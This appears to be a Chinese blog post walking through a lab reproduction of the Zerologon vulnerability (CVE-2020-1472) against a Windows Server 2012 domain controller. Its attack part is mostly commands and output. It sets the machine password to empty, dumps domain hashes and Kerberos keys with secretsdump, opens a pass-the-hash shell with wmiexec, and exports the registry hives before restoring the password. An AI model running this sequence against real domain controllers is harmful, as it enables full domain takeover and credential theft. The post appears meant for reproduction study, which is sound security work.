环境

1.攻击机 windows 10
2.域控服务器 windows server 2012 192.168.139.147
3.python 3.8
4.复现工具,大概看了下,工具基本都差不多,这个帮助写的比较详细(但是楼主在复现过程中,还是遇到许多坑),https://github.com/VoidSec/CVE-2020-1472

复现流程

1.检测是否可利用
2.将域控密码设置为空
3.恢复原来的域控密码

坑点

1.要用最新版的Impacket v0.9.22.dev1+20200915.160006.1397e2b5
2.linux下执行脚本在出现$之类的特殊字符需要转义,我在window下执行,没遇到这个问题
3.域和计算机名搞混淆,导致参数填写错误,哪个是域,哪个是计算机名,看下图

1.png

4.显示颜色乱码的话,在脚本开头处添加:

import os
os.system("")

关于坑点1:
在windows中有python启动器,py -3指定使用python3,防止选错python版本

安装impacket这步,手动安装,并且把requirements.txt中的impacket==0.9.21这行去掉,不然执行py -3 pip install -r requirements.txt安装其他库时,impacket又装一遍,会覆盖掉最新版

安装过程:
先卸载旧版本:
py -3 -m pip uninstall impacket

安装新版本:
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
py -3 setup.py install

报错说明


1.AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2',属于坑点1,手动安装impacket解决
2.secretsdump.py执行后无法获取NTDS.DIT信息,多半是域和计算机名混淆或者出现$未转义,对照坑点3的图片,确认下
3.[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)多半是域和计算机名混淆或者出现$未转义,对照坑点3的图片,确认下,自己环境中对应的参数填写正确没。

检测和利用

关于坑点3,这一步要输入计算机名

py -3 cve-2020-1472-exploit.py -n 2k12vitcim -t 192.168.139.147

参数:

-n  计算机名
-t  域控ip

获取管理员ntlm hash

secretsdump.py -no-pass -just-dc [email protected]

参数:

-no-pass    无密码登录
-just-dc    仅提取NTDS.DIT​​数据(NTLM哈希和Kerberos键)
[email protected] [email protected]

正常的输出:

Impacket v0.9.22.dev1+20200915.160006.1397e2b5 - Copyright 2020 SecureAuth Corporation

<li> Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
<li> Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868:::
此处省略
<li> Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:73ecb6feb447b5c734f1b6819b7dea3d91165f6d1c6fefc9169208c8548bfeaa
此处省略
<li> Cleaning up...

获取域控shell和导出域控计算机帐户的原始NT哈希

执行以下命令,获取域控的shell:

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868 [email protected]

参数:

-hashes 域管理员的nthash:lmhash
[email protected]  [email protected]

然后在获取到的shell中执行以下命令,导出域控计算机帐户的注册表文件

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

get system.save
get sam.save
get security.save

del /f system.save
del /f sam.save
del /f security.save

执行以下命令,在本地获取域控计算机帐户的原始NT哈希:

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

正常的输出:

Impacket v0.9.22.dev1+20200915.160006.1397e2b5 - Copyright 2020 SecureAuth Corporation

<li> Target system bootKey: 0xb1a104ff3738f1a53c78e57a6662ea84
<li> Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c39341d869ebba9f4d09b58adf16868:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<li> Dumping cached domain logon information (domain/username:hash)
<li> Dumping LSA Secrets
<li> $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8a8fea4a70166fae078958bf69441290
<li> DPAPI_SYSTEM
dpapi_machinekey:0x6750d5c297f09dcbc8c595d3b578d1e6bcf99fd2
dpapi_userkey:0x7f509a6c59339522545664b4db73d393d15bd2e3
<li> NL$KM
0000   58 98 99 4F 48 70 C3 24  65 38 D0 73 05 8A 4F BA   X..OHp.$e8.s..O.
0010   F7 AD DC 33 DA E2 D3 2F  B7 4A 72 D6 C7 55 8A 90   ...3.../.Jr..U..
0020   59 52 74 40 99 77 FA D6  BF 4C 5A B7 A4 8B 43 DE   YRt@.w...LZ...C.
0030   E8 39 6F BA 39 D3 C6 DF  E4 3C 73 98 1E 23 DC 09   .9o.9....<s..#..
NL$KM:5898994f4870c3246538d073058a4fbaf7addc33dae2d32fb74a72d6c7558a90595274409977fad6bf4c5ab7a48b43dee8396fba39d3c6dfe43c73981e23dc09
<li> Cleaning up...

恢复原来的域控hash

使用上一步中,$MACHINE.ACC:plain_password_hex:后面的值作为参数,执行:

py -3 reinstall_original_pw.py 2k12vitcim 192.168.139.147 e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1

正常的输出:

reinstall_original_pw.py 2k12vitcim 192.168.139.147 e0bf26bbac26ad8eb7d529565a8d3497059197aef079318a68c94f05376dda655ceafa4c385630ad0a99067f7e80cea795eb42e7043d57942cb4d131c4a4cd95cfd3e245180f72c887ad5bddaddea4b778a536ccaf75152cfc2efedbd09b74fa77766c5258fb01eeb43574e5aa1a4572b79a6d54c7ccf212543cc4e31def988ac32f0a6b1185b85150bc6ff1a074864d5808c23f4afc05c08da37d89591c7711d4246639c35e780a006c967424b5373adf2559af2196ee0dcfed57fadf5d59603fbb193382decccdde1ff3e1edd2691c04d618f4c72ac9b579c54df2c53378ec5df50ec766b1dcbe87566af365eb2ba1
Performing authentication attempts...

======================================================================================================================================================================================================================================================================================================================================

NetrServerAuthenticate3Response
ServerCredential:
Data: b'xdexcfAaQ3x1a*'
NegotiateFlags: 556793855
AccountRid: 1002
ErrorCode: 0

server challenge b'xdeax10x90x15qxc3t'
session key b'Usxb2xd9#x8cx132x98Zv,xb6xb5S^'
NetrServerPasswordSetResponse
ReturnAuthenticator:
Credential:
Data: b'x01x14xd2xd0x11xb9x02xc4'
Timestamp: 0
ErrorCode: 0

Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.

标签: CVE-2020-1472复现坑点和报错说明指南

添加新评论